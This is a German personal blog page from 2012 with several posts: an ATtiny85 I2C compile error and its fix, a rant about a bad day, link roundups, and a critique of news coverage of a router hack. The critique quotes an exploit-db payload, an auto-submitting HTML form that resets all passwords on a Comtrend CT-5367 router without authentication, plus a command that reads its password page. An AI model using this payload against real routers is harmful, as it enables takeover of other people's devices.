error: 'TWSR' undeclared (first use in this function)

Momentan bin ich ja am überlegen, in meinen Terrarium Controller "Terraduino" eine Failsafe-Platine einzubauen. Dafür bin ich jetzt am experimentieren, wie man am Attiny85 (den hab ich da), I2C spricht. Ich hab mir also die "TWI/I2C library for Wiring & Arduino" zur Brust genommen, mir einen Attiny-Compatibility-Layer besorgt, den Kram zusammengehackt und dann mit dem avr-gcc versucht zu compilieren. Das kam dabei heraus:

env -P/usr/local/bin:/usr/bin - avr-gcc -g -mmcu=attiny85 \
  -Wall -Wstrict-prototypes -Os -mcall-prologues -funsigned-char \
  -funsigned-bitfields -fpack-struct -fshort-enums -Wundef -I. \
  -I../at/tiny/cores/tiny -DARDUINO=101 \
  -DF_CPU=16000000L -Os -c twi.c -o twi.o
twi.c: In function 'twi_init':
twi.c:80: error: 'TWSR' undeclared (first use in this function)
twi.c:80: error: (Each undeclared identifier is reported only once
twi.c:80: error: for each function it appears in.)
twi.c:80: error: 'TWPS0' undeclared (first use in this function)
twi.c:81: error: 'TWPS1' undeclared (first use in this function)
twi.c:82: error: 'TWBR' undeclared (first use in this function)
twi.c:90: error: 'TWCR' undeclared (first use in this function)
twi.c:90: error: 'TWEN' undeclared (first use in this function)
twi.c:90: error: 'TWIE' undeclared (first use in this function)
twi.c:90: error: 'TWEA' undeclared (first use in this function)
[..]

Tja. Und dann habe ich mich praktisch zu Tode gegoogelt. Verursacht wird das Ganze weil die entsprechenden Makros fehlen. Zunächst dachte ich, die fehlen, weil auf irgendeine magische Weise die Datei avr/iotn85.h nicht included wurde. Also hab ich sie included und bekam noch mehr komische Fehlermeldungen:

Attempt to include more than one  file.
Include  instead of this file.

Natürlich hat das nichts gerbacht, zumal die avr/io.h bereits included war. Langer Rede, kurzer Sinn: letzlich habe ich herausgefunden, dass der Attiny85 halt keinen TWI Support hat. Somit sind die entsprechenden Macros nicht definiert und daher kamen die Fehler.

Zum Glück hat der Attiny85 aber USI Support eingebaut und dafür gibt es auch eine I2C Slave Library. Runtergeladen, Eingebunden und den avr-gcc damit gefüttert: Läuft.

Sehr schön :)

10 October 2012 | #source

 

Ein scheiss Tag

Heute war einer dieser Tage. An sich nicht dramatisch aber in Summe eher wenig erbaulich.

In die Innenstadt gefahren.

Mehr als 10 Minuten zur Bank gelatscht.

War ein Typ vor mir am Schalter, der dort offenbar dabei war eine Bank zu gründen oder so.

Nach 20 Minuten Scheck eingelöst.

"Das hätten Sie auch draussen am Automaten machen können".

Vielen Dank.

Wieder zurück gelatscht.

In den Saturn gegangen wegen MP3 Player Gucken, weil iPod tot.

Es war nur Scheisse im Angebot.

Zum S-Bahnhof zurück getapert.

S-Bahn verpasst.

Endlich kam eine, die hielt aber am Ostbahnhof anstatt durchzufahren.

Also aussteigen und auf die nächste warten.

Falscher Bahnsteig.

Es fing an zu regnen.

Aus der S-Bahn gestiegen und 15 Minuten nach Hause geschwommen.

Türe geöffnet.

Es stank (und stinkt noch immer) nach Katzenklo. Weil die neue Mieterin etwa 20 Katzen beherbergt.

Oben in der Wohnung angekommen.

Es stinkt immer noch nach Katzenklo. IN meiner Wohnung.

Was für ein scheiss Tag!

09 October 2012 | #draussengewesen

 

Remote Exploit via 192.168.1.1

Heise berichtet mit der Überschrift "4,5 Millionen Router gehackt" über einen Vortrag von einem Snakeoil-Vertreter namens Fabio Assolini über einen remote exploit mit denen Hacker 4.5 Millionen Router in Brasilien gehackt haben wollen.

Netterweise verlinkt Heise auf die exploit-db, die sie so verlinken:

Dafür haben sie mittels zweier Bash-Scripte per Cross Site Request Forgery (CSRF) zunächst das Administrator-Passwort geändert und im zweiten Schritt den DNS-Server-Eintrag im Router manipuliert.

Ich bin dem Link gefolgt und fand dort erstens überhaupt kein Bash-Script und von "remote" ist dort auch nichts zu sehen, sondern sowas hier:

root@linux:~#  get.pl http://192.168.1.1/password.cgi   ## Information Disclosure

Das sieht jetzt eher nicht nach remote Exploit aus. Dann ändern die "Hacker" die Routerpasswörter mit:

[CUT EXPLOIT HERE]                        ## CSRF For Change All passwords
<html>
<head></head>
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<!-- Change default system Passwords to "shpek" without authentication and verification -->
<input type="hidden" name="sptPassword" value="shpek">
<input type="hidden" name="usrPassword" value="shpek">
<input type="hidden" name="sysPassword" value="shpek">
</form>
</body>
</html>
[CUT EXPLOIT HERE]

Das sieht jetzt eher auch nicht nach Cross Site Request Forgery aus, sondern eher nach einem simplen HTT Post Request, mit dem man einfach die Passwörter bei dem Router ändern kann ohne authentisiert zu sein.

Es ist ja schlimm genug, wenn sich solche Trolle heutzutage Hacker nennen dürfen, noch schlimmer ist, wenn die solchen Bockmist in eine exploit-db publiziert kriegen, und noch viel schlimmer, dass ein Kaspersky Mann das auch noch in einem Vortrag erwähnt. Aber, dass Heise.de darüber berichtet (oder abschreibt?!) ohne irgendwelche Details nachzuprüfen, ist eine Katastrophe.

04 October 2012 | #unfassbar

 

Krimskrams, Goggelmoggel und Muggefugg

Update 2012-10-04:

Moosbälle kennt jeder Aquarianer. Aber wehe man plant, die Teile in Australien einzusetzen. L<Dann gibts Gefängnis|http://www.practicalfishkeeping.co.uk/content.php?sid=5286> oder wie im Fall der Täterin hier 250 soziale Arbeit. Sie ist aber nur knapp am Gefängnis vorbeigeschrammt. OMG!

04 October 2012 | #gefunden

 

Krimskrams, Goggelmoggel und Muggefugg

Update 2012-10-02:

Haha: L<فليبارك الله أميركا|http://inothernews.tumblr.com/post/32732165320><p>Update 2012-10-02:</p>SPAM ist ja bekanntlich immer nervig. Neuerdings bekomme ich auch SPAM von Twitter (weil ich den Ferienhaus-Account betreuue), noch dazu mit Webbugs. Als ob mein MailScanner die ignorieren würde. Pappnasen. Und dann die Verzweiflung, die aus dem Text trieft:

Verschönere Dein Profil mit einem Header-Bild. Durchsuche Deine neue Fotogalerie. Sieh Dir an, was andere Leute mit ihren Profilen machen. Versuche es jetzt. Hol Dir die App und versuche es jetzt.

Vögel.<p>Update 2012-10-02:</p>Was haben Myanmar, Sudan, Saudi-Arabien, Nordkorea, Syrien und Deutschland gemeinsam? L<Bestechung von Abgeordneten ist nicht strafbar|https://netzpolitik.org/2012/exklusiv-wir-veroffentlichen-das-geheime-gutachten-das-strengere-gesetze-gegen-abgeordnetenbestechung-fordert/>.<p>Update 2012-10-02:</p>Sicherheitsfrage
Ghttp://www.bizarrocomics.com/?p=8762|http://www.bizarrocomics.com/wp-content/uploads/2012/09/bz-panel-09-27-12.jpg<p>Update 2012-10-02:</p>L<Rezension über “Isch geh Schulhof” von Philipp Möller von Nic|http://nicsbloghaus.org/2012/10/01/krankes-bildungssystem/>. Neue Erkenntnisse gibt es zwar keine, aber falsche Schlussfolgerungen und Forderungen: sowohl der Autor als auch Nic überlegen, wie man “Die Politik” dazu bringen könnte, das Problem der Bildungsmisere zu erkennen. Es ist aber genau andersrum. Wie kann man die Leute dazu bringen, zu erkennen, dass die sogenannte “Bildungsmisere” Absicht ist? Das die zunehmende Verdummung der Bevölkerung Gewollt ist? Und zwar weil man sie dann leichter im Griff hat? Irgendwie sehen das die Protagonisten aus der Bildungsbranche nicht. Dabei müsste man nur mal ein Geschichtsbuch aufschlagen. Da stehts drin.<p>Update 2012-10-02:</p>Die “Sea Education Association” führt eine Expedition in den Pazifik durch, bei der die Auswirkungen des Plastiks untersucht werden, das dort in rauen Mengen herumschwimmt. L<Auf der Webseite gibt es regelmäßige Updates|http://www.sea.edu/plastics/>.<p>Update 2012-10-02:</p>Die Erde singt. In dem Beitrag von Phil Plait ist auch ein MP3 verlinkt, unbedingt anhören. Die NASA hat Radiowellen aus der näheren Erdumgebung, die dort durch Interferenzen zwischen dem Erdmagnetfeld und Sonnenaktivität verursacht werden, in Audiowellen übersetzt. Hört sich wirklich schön an. Und schräg. L<The song of killer electrons|http://blogs.discovermagazine.com/badastronomy/2012/10/01/the-song-of-killer-electrons/>

02 October 2012 | #gefunden